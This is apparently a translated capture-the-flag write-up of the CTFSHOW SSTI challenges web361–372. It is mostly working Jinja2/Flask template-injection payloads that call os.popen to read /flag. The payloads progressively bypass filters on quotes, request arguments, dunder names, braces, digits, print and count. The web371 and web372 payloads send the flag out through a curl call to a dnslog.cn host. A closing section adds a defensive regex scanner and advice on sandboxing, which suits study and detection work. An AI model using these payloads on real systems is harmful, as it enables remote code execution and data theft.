CTFSHOW SSTI Practice

Preface

It has been a long time since I did any SSTI challenges; CTFSHOW happens to have a few related ones, so let's take them down!

web361 & web362

No filtering at all; go straight in.

Payload: ?name={{lipsum.__globals__.__getitem__("os").popen("cat /flag").read()}}

For 362 I'm not sure what is filtered; I just hit it with the same Payload directly.

web363

Single and double quotes are filtered; this can be bypassed through the request object.

Payload: ?name={{lipsum.__globals__.__getitem__(request.args.a).popen(request.args.b).read()}}&a=os&b=cat /flag

web364 & web365

request.args is filtered as well. I originally wanted to use a POST request, but that request method isn't allowed, so I switched to request.cookies.

Payload: ?name={{lipsum.__globals__.__getitem__(request.cookies.a).popen(request.cookies.b).read()}}

With the Cookie: a=os;b=cat /flag

For 365 I'm not sure what is filtered; the 364 Payload worked.

web366 & web367

__globals__, __getitem__ and [] are filtered on top of that, so I start using Flask's template filters.

Payload: ?name={{((lipsum|attr(request.cookies.c))|attr(request.cookies.d)(request.cookies.a)).popen(request.cookies.b).read()}}

With the Cookie: a=os;b=cat /flag;c=__globals__;d=__getitem__

For 367 I'm not sure what is filtered; the 366 Payload worked.

web368

{{}} is filtered; bypass with {%%}.

Payload: ?name={% print(((lipsum|attr(request.cookies.c))|attr(request.cookies.d)(request.cookies.a)).popen(request.cookies.b).read())%}

With the Cookie: a=os;b=cat /flag;c=__globals__;d=__getitem__

web369

This one bans request outright, which left me completely baffled!!! Then I went back over 羽师傅's advanced SSTI article.

Since {%%} is available here, statements can be executed: the strings we need are built by concatenating characters and assigning them to variables.

Payload: ?name={%set a=dict(po=aa,p=aa)|join%}{% set b=(lipsum|string|list)|attr(a)(18)%}{%set c=(b,b,dict(glob=cc,als=aa)|join,b,b)|join%}{%set d=(b,b,dict(getit=cc,em=aa)|join,b,b)|join%}{%set e=dict(o=cc,s=aa)|join%}{% set f=(lipsum|string|list)|attr(a)(9)%}{%set g=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-8)%}{%set i=(dict(cat=aa)|join,f,g,dict(flag=aa)|join)|join%}{%print ((lipsum|attr(c))|attr(d)(e)).popen(i).read()%}

web370

Digits are banned outright as well; the idea here is to use count to produce the numbers.

Payload: ?name={%set a=dict(po=aa,p=aa)|join%}{%set j=dict(eeeeeeeeeeeeeeeeee=a)|join|count%}{%set k=dict(eeeeeeeee=a)|join|count%}{%set l=dict(eeeeeeee=a)|join|count%}{% set b=(lipsum|string|list)|attr(a)(j)%}{%set c=(b,b,dict(glob=cc,als=aa)|join,b,b)|join%}{%set d=(b,b,dict(getit=cc,em=aa)|join,b,b)|join%}{%set e=dict(o=cc,s=aa)|join%}{% set f=(lipsum|string|list)|attr(a)(k)%}{%set g=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-l)%}{%set i=(dict(cat=aa)|join,f,g,dict(flag=aa)|join)|join%}{%print ((lipsum|attr(c))|attr(d)(e)).popen(i).read()%}

web371

This one took a long time to construct, because print is banned, and the only thing I could think of was exfiltrating the data out-of-band, which means building something of the form

ping `cat /flag`.vhthja.dnslog.cn

so the backtick and the dot had to be found as well. In the end ping could not be used, but curl could.

Payload: ?name={%set a=dict(po=aa,p=aa)|join%}{%set j=dict(eeeeeeeeeeeeeeeeee=a)|join|count%}{%set k=dict(eeeeeeeee=a)|join|count%}{%set l=dict(eeeeeeee=a)|join|count%}{%set n=dict(eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee=a)|join|count%}{%set m=dict(eeeeeeeeeeeeeeeeeeee=a)|join|count%}{% set b=(lipsum|string|list)|attr(a)(j)%}{%set c=(b,b,dict(glob=cc,als=aa)|join,b,b)|join%}{%set d=(b,b,dict(getit=cc,em=aa)|join,b,b)|join%}{%set e=dict(o=cc,s=aa)|join%}{% set f=(lipsum|string|list)|attr(a)(k)%}{%set g=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-l)%}{%set p=((lipsum|attr(c))|string|list)|attr(a)(n)%}{%set q=((lipsum|attr(c))|string|list)|attr(a)(m)%}{%set i=(dict(curl=aa)|join,f,p,dict(cat=a)|join,f,g,dict(flag=aa)|join,p,q,dict(vhthja=a)|join,q,dict(dnslog=a)|join,q,dict(cn=a)|join)|join%}{%if ((lipsum|attr(c))|attr(d)(e)).popen(i)%}atao{%endif%}

web372

The final challenge bans count; I was out of ideas, and only after reading 羽师傅's article did I learn that length can replace count. Brilliant.

Payload: ?name={%set a=dict(po=aa,p=aa)|join%}{%set j=dict(eeeeeeeeeeeeeeeeee=a)|join|length%}{%set k=dict(eeeeeeeee=a)|join|length%}{%set l=dict(eeeeeeee=a)|join|length%}{%set n=dict(eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee=a)|join|length%}{%set m=dict(eeeeeeeeeeeeeeeeeeee=a)|join|length%}{% set b=(lipsum|string|list)|attr(a)(j)%}{%set c=(b,b,dict(glob=cc,als=aa)|join,b,b)|join%}{%set d=(b,b,dict(getit=cc,em=aa)|join,b,b)|join%}{%set e=dict(o=cc,s=aa)|join%}{% set f=(lipsum|string|list)|attr(a)(k)%}{%set g=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-l)%}{%set p=((lipsum|attr(c))|string|list)|attr(a)(n)%}{%set q=((lipsum|attr(c))|string|list)|attr(a)(m)%}{%set i=(dict(curl=aa)|join,f,p,dict(cat=a)|join,f,g,dict(flag=aa)|join,p,q,dict(fgpozq=a)|join,q,dict(dnslog=a)|join,q,dict(cn=a)|join)|join%}{%if ((lipsum|attr(c))|attr(d)(e)).popen(i)%}atao{%endif%}
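As an added defensive example (not from the original post), the following Python flags the request shapes seen across these challenges by their structure instead of by banned keywords; the sample request lines and the indicator names are constructed for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample traffic (not from the original post): one benign request,
# then shapes matching the writeup's bypass progression. Entries are
# (request line, Cookie header).
SAMPLE_REQUESTS = [
    ("GET /?name=alice", ""),
    ("GET /?name={{lipsum.__globals__.__getitem__(request.cookies.a).popen(request.cookies.b).read()}}",
     "a=os;b=cat /flag"),
    ("GET /?name={%set a=dict(po=aa,p=aa)|join%}{%set j=dict(eeeeeeeeeeeeeeeeee=a)|join|length%}", ""),
    ("GET /?name=%257B%257Blipsum%257D%257D", ""),  # double URL-encoded {{lipsum}}
]

# Structural indicators rather than a word blocklist: the writeup shows every
# keyword ban being side-stepped (quotes -> request.args -> request.cookies,
# __globals__/__getitem__ -> |attr with cookie-supplied names, digits -> |count,
# count -> |length), while the delimiters and the filter chain survive each stage.
INDICATORS = {
    "template_delimiter": re.compile(r"\{\{|\{%"),
    "dunder_attribute": re.compile(r"__[a-z]+__"),
    "jinja_filter_chain": re.compile(r"\|\s*(?:attr|join|count|length|string|list)\b"),
    "request_object": re.compile(r"\brequest\.(?:args|cookies|values|form)\b"),
    "os_popen": re.compile(r"\bpopen\s*\("),
}


def normalise(value: str) -> str:
    """URL-decode twice so a double-encoded payload is inspected in the clear."""
    for _ in range(2):
        value = unquote_plus(value)
    return value


def scan_request(request_line: str, cookie_header: str = "") -> list:
    """Return the names of the SSTI indicators found in the query string or cookies."""
    text = normalise(request_line) + " " + normalise(cookie_header)
    return [name for name, pattern in INDICATORS.items() if pattern.search(text)]


def flagged_requests(requests=SAMPLE_REQUESTS) -> dict:
    """Map each suspicious request line to the indicators it triggered."""
    flagged = {}
    for line, cookie in requests:
        hits = scan_request(line, cookie)
        if hits:
            flagged[line] = hits
    return flagged
```

The durable fix on the application side is to never place user input in the template source (pass it as a context variable instead) and to render untrusted templates only inside a jinja2 SandboxedEnvironment; the scan above is for spotting attempts in logs or at a WAF.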
Original address: https://www.cnblogs.com/erR0Ratao/p/14397131.html